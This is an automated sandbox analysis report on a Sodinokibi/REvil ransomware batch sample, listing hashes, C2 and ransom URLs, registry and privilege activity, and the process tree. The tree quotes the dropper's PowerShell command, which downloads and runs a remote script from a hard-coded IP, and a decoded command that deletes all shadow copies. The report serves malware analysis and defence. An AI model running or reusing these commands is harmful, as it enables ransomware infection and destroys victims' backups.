Analysis
max time kernel: 141s
max time network: 141s
platform: windows7_x64
resource: win7v200430
submitted: 04-05-2020 09:10
Static task: static1
Behavioral task: behavioral1 (Sample: TG4Rrn07.bat, Resource: win7v200430)
Behavioral task: behavioral2 (Sample: TG4Rrn07.bat, Resource: win10v200430)
General
Target: TG4Rrn07.bat
Size: 196B
MD5: 36415cbe52b3dbeb2af9a30c6815a0c5
SHA1: 25d0489eedaaaef75455ece1a89485cca32a0a9c
SHA256: ce54af523565e53dcd1273a581513a9fec0bdaef947c269bb4cc8b6b2d70c201
SHA512: de5b0ee7eae56f9d6992c512f6a090941da641f6a7eb17ce46d4d743856d08de53886a72cda6ca87cd678aca2fe15b018093b297a0f35016370b90754bb26500
Malware Config
Extracted: http://185.103.242.78/pastes/TG4Rrn07
Extracted: C:\dc5v2ye0p9-readme.txt
Family: sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/038CBD1E4C6AA933
http://decryptor.cc/038CBD1E4C6AA933
Signatures
Makes http(s) request (30 IoCs)
Contacts server via http/https, possibly for C2 communication.
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Process: powershell.exe (PID 1052)
Modifies system certificate store
Process: powershell.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = [certificate blob not shown]
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = [certificate blob not shown]
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = [certificate blob not shown]
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = [certificate blob not shown]
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [certificate blob not shown]
Drops desktop.ini file(s) (74 IoCs)
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Blacklisted process makes network request (88 IoCs)
Process: powershell.exe (PID 1052), network flows 1, 6, 8, 10, 12, 13, 15, 17, 18, 20, 21, 23, 25, 27, 28, 30, 32, 33, 35, 37, 39, 41, 43, 45, 47, 49, 50, 55, 57, 58, 60, 61, 63, 64, 66, 67, 69, 71, 73, 75, 77, 79, 81, 82, 84, 85, 87, 88, 90, 92, 94, 96, 98, 100, 102, 104, 106, 108, 110, 112, 113, 115, 117, 120
Modifies service (2 TTPs, 4 IoCs)
Process: vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
Drops file in System32 directory (1 IoCs)
Process: powershell.exe
File opened for modification C:\Windows\System32\CatRoot2\dberr.txt
Suspicious use of WriteProcessMemory (5 IoCs)
PID 272 cmd.exe wrote to memory of PID 1052 powershell.exe
PID 1052 powershell.exe wrote to memory of PID 1772 powershell.exe (recorded 4 times)
Suspicious use of AdjustPrivilegeToken (8 IoCs)
Token: SeDebugPrivilege, PID 1052 powershell.exe
Token: SeDebugPrivilege, PID 1052 powershell.exe
Token: SeDebugPrivilege, PID 1772 powershell.exe
Token: SeBackupPrivilege, PID 1848 vssvc.exe
Token: SeRestorePrivilege, PID 1848 vssvc.exe
Token: SeAuditPrivilege, PID 1848 vssvc.exe
Token: SeTakeOwnershipPrivilege, PID 1052 powershell.exe
Token: SeDebugPrivilege, PID 1332 WerFault.exe
Enumerates connected drives (3 TTPs)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops startup file (3 IoCs)
Process: powershell.exe
File created \??\c:\users\admin\appdata\roaming\microsoft\word\startup\dc5v2ye0p9-readme.txt
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\dc5v2ye0p9-readme.txt
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\desktop.ini
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Process: powershell.exe
Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\duad2hg0hl5.bmp"
Drops file in Program Files directory (38 IoCs)
Suspicious behavior: EnumeratesProcesses (10 IoCs)
PID 1052 powershell.exe (3 entries)
PID 1772 powershell.exe (2 entries)
PID 1332 WerFault.exe (5 entries)
Program crash (1 IoCs)
PID 1332 WerFault.exe, target PID 1216
Suspicious behavior: RenamesItself (1 IoCs)
Process: powershell.exe (PID 1052)
Processes
C:\Windows\system32\cmd.exe (PID 272)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\TG4Rrn07.bat"
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1052)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/TG4Rrn07');Invoke-MWPGMZMBXDRKB;Start-Sleep -s 10000"
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Modifies system certificate store
    - Drops desktop.ini file(s)
    - Blacklisted process makes network request
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Drops startup file
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: RenamesItself
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1772)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, which accounts for the vssvc.exe activity and the SeBackupPrivilege/SeRestorePrivilege tokens recorded above)
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\vssvc.exe (PID 1848)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\WerFault.exe (PID 1332)
  Command line: C:\Windows\system32\WerFault.exe -u -p 1216 -s 3056
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Program crash